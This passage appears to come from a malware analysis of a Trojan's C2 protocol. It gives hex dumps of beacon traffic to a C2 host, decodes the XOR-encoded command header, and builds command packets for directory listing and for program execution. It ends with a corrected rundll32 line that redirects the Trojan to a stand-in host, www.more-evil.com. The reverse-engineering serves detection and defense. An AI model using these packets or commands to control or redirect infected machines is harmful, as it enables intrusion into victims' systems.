000000A0  74 65 6e 74 2d 4c 65 6e  67 74 68 3a 20 34 38 0d tent-Len gth: 48.
000000B0  0a 50 72 6f 78 79 2d 43  6f 6e 6e 65 63 74 69 6f .Proxy-C onnectio
000000C0  6e 3a 20 6b 65 65 70 2d  61 6c 69 76 65 0d 0a 50 n: keep- alive..P
000000D0  72 61 67 6d 61 3a 20 6e  6f 2d 63 61 63 68 65 0d ragma: n o-cache.
000000E0  0a 0d 0a 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000F0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 10 ........ ........
00000100  00 00 00 e2 f1 e6 e9 8a  e3 e3 e5 eb f1 91 e5 f6 ........ ........
00000110  ff e9 a7                                         ...
 00000000  48 54 54 50 2f 31 2e 31  20 32 30 30 20 4f 4b 0d HTTP/1.1  200 OK.
 00000010  0a 44 61 74 65 3a 20 57  65 64 20 4d 61 79 20 30 .Date: W ed May 0
 00000020  34 20 30 35 3a 35 34 3a  35 37 20 32 30 31 31 0d 4 05:54: 57 2011.
 00000030  0a 53 65 72 76 65 72 3a  20 41 70 61 63 68 65 2f .Server:  Apache/
 00000040  31 2e 33 2e 32 30 20 28  55 6e 69 78 29 20 20 28 1.3.20 ( Unix)  (
 00000050  52 65 64 2d 48 61 74 2f  4c 69 6e 75 78 29 0d 0a Red-Hat/ Linux)..
 00000060  43 6f 6e 74 65 6e 74 2d  4c 65 6e 67 74 68 3a 20 Content- Length: 
 00000070  34 33 0d 0a 43 6f 6e 74  65 6e 74 2d 54 79 70 65 43..Cont ent-Type
 00000080  3a 20 61 70 70 6c 69 63  61 74 69 6f 6e 2f 6f 63 : applic ation/oc
 00000090  74 65 74 2d 73 74 72 65  61 6d 0d 0a 50 72 6f 78 tet-stre am..Prox
 000000A0  79 2d 43 6f 6e 6e 65 63  74 69 6f 6e 3a 20 6b 65 y-Connec tion: ke
 000000B0  65 70 2d 61 6c 69 76 65  0d 0a 0d 0a 00 00 00 00 ep-alive ........
 000000C0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 000000D0  00 00 00 00 00 00 00 00  0b 00 00 00 c9 c2 d0 f8 ........ ........
 000000E0  cf c8 d4 d3 f8 93 a7                             .......
00000113  50 4f 53 54 20 68 74 74  70 3a 2f 2f 70 69 63 74 POST htt p://pict
00000123  75 72 65 2e 75 63 70 61  72 6c 6e 65 74 2e 63 6f ure.ucpa rlnet.co
00000133  6d 3a 34 34 33 2f 4c 46  44 58 46 69 52 63 56 73 m:443/LF DXFiRcVs
00000143  33 39 30 32 2e 72 61 72  20 48 54 54 50 2f 31 2e 3902.rar  HTTP/1.
00000153  31 0d 0a 55 73 65 72 2d  41 67 65 6e 74 3a 20 4d 1..User- Agent: M
00000163  6f 7a 69 6c 6c 61 2f 34  2e 32 2e 32 30 20 28 63 ozilla/4 .2.20 (c
00000173  6f 6d 70 61 74 69 62 6c  65 3b 20 4d 53 49 45 20 ompatibl e; MSIE 
00000183  35 2e 30 2e 32 3b 20 57  69 6e 33 32 29 0d 0a 48 5.0.2; W in32)..H
00000193  6f 73 74 3a 20 70 69 63  74 75 72 65 2e 75 63 70 ost: pic ture.ucp
000001A3  61 72 6c 6e 65 74 2e 63  6f 6d 20 0d 0a 43 6f 6e arlnet.c om ..Con
000001B3  74 65 6e 74 2d 4c 65 6e  67 74 68 3a 20 36 38 32 tent-Len gth: 682
000001C3  0d 0a 50 72 6f 78 79 2d  43 6f 6e 6e 65 63 74 69 ..Proxy- Connecti
000001D3  6f 6e 3a 20 6b 65 65 70  2d 61 6c 69 76 65 0d 0a on: keep -alive..
000001E3  50 72 61 67 6d 61 3a 20  6e 6f 2d 63 61 63 68 65 Pragma:  no-cache
000001F3  0d 0a 0d 0a                                      ....
000001F7  02 6e 65 77 5f 68 6f 73  74 5f 34 00 00 00 00 00 .new_hos t_4.....
00000207  00 00 00 00 00 00 00 00  00 00 00 00 8a 02 00 00 ........ ........
00000217  1c 16 1c 58 a7 a7 a7 a7  a7 a7 a7 a7 a7 a7 a7 a7 ...X.... ........
  • Another behavior of this Trojan is that it expects the commands to be transmitted separately from the HTTP header, otherwise data is misaligned and nothing works.
  • The commands from the C2 node will have an HTTP header, followed by binary data.
  • The first 32 bytes of the binary data serve as a header, which has the following structure:
    • Byte 0:               Can be 0, 1, or 2.  Needs to be 2 for a command to be processed.
    • Bytes 29 – 32:   An integer specifying the length of the data that follows the 32 byte header.
  • The data following the 32 byte header has the following structure (on the wire every byte mentioned below would be XOR-ed with 0xA7):
    • It must be at least 0x148 bytes (328 bytes) long.
    • Byte 0:  Must be 0xA1 or 0xBB.
      • When 0xA1:
        • Byte 1:  Can be 0xB1 through 0xC1.  These are a group of commands the Trojan executes.
      • When 0xBB:
        • Byte 1:  Can be 0xB1 through 0xB4.  These are a second group of commands the Trojan executes.
  • Now I will give some examples of commands that worked for me.  Please note that I do not have any actual PCAPs that contain these commands, so some of the filler data (NULLs) may be different.
  • The command that instructs the Trojan to perform a directory listing is shown below (again, on the wire the data following the 32 byte header would be XOR-ed with 0xA7):
 00000098  48 54 54 50 2f 31 2e 31  20 32 30 30 20 4f 4b 0d HTTP/1.1  200 OK.
 000000A8  0a 43 6f 6e 74 65 6e 74  2d 4c 65 6e 67 74 68 3a .Content -Length:
 000000B8  20 33 36 38 0d 0a 43 6f  6e 74 65 6e 74 2d 54 79  368..Co ntent-Ty
 000000C8  70 65 3a 20 61 70 70 6c  69 63 61 74 69 6f 6e 2f pe: appl ication/
 000000D8  6f 63 74 65 74 2d 73 74  72 65 61 6d 0d 0a 50 72 octet-st ream..Pr
 000000E8  6f 78 79 2d 43 6f 6e 6e  65 63 74 69 6f 6e 3a 20 oxy-Conn ection:
 000000F8  6b 65 65 70 2d 61 6c 69  76 65 0d 0a 0d 0a       keep-ali ve....
 00000106  02 6e 65 77 5f 68 6f 73  74 5f 34 00 00 00 00 00 .new_hos t_4.....
 00000116  00 00 00 00 00 00 00 00  00 00 00 00 50 01 00 00 ........ ....P...
 00000126  a1 b1 00 63 00 3a 00 5c  00 00 00 00 00 00 00 00 ...c.:.\ ........
 00000136  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000146  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000156  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000166  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000176  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000186  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000196  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 000001A6  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 000001B6  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 000001C6  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 000001D6  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 000001E6  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 000001F6  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000206  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000216  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000226  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000236  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000246  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000256  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000266  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
  • Here is the command to execute notepad.exe.  Notice that at offset 0x107 of the data following the 32 byte header we need to have 0xAA000000 and offset 0x13F must be 0x00000000:
00000000   02 6E 65 77 5F 68 6F 73  74 5F 34 00 00 00 00 00    new_host_4    
00000010   00 00 00 00 00 00 00 00  00 00 00 00 50 01 00 00               P  
00000020   A1 B7 00 6E 00 6F 00 74  00 65 00 70 00 61 00 64   ¡· n o t e p a d
00000030   00 2E 00 65 00 78 00 65  00 00 00 00 00 00 00 00    . e x e       
00000040   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000050   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000060   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000070   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000080   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000090   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
000000A0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
000000B0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
000000C0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
000000D0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
000000E0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
000000F0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000100   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000110   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000120   00 00 00 00 00 00 00 AA  00 00 00 00 00 00 00 00          ª       
00000130   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000140   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000150   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000160   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
  • Hopefully these two examples clarify the format of the rest of the commands.
  • One additional observation I made during my analysis is that file ~Thumbbs.tmp serves as a log file that records when a command was executed and if there were any errors.  The data of this file is XOR-ed with 0xAB.  Here is a sample output (decrypted) after a command is successfully executed:
2011-05-05 19:48:31    FileCmd __xxx__ >=Win2k
  • Finally, I mentioned above that command 0xBBB4 does not really work.  When this command is called a C2 node domain name or IP address would be passed as an argument.  The Trojan then executes the following command on the system:
rundll32.exe "C:\WINDOWS\system32\dhcpsrv.dll",TStartUp 0x22 www.more-evil.com
  • This command fails because there is no exported function named TStartUp.  This may have been an older name that the author forgot to update on this iteration of the Trojan.
  • This command works perfectly well if we make this call with the correct function name:
rundll32.exe "C:\WINDOWS\system32\dhcpsrv.dll",CRestart 0x22 www.more-evil.com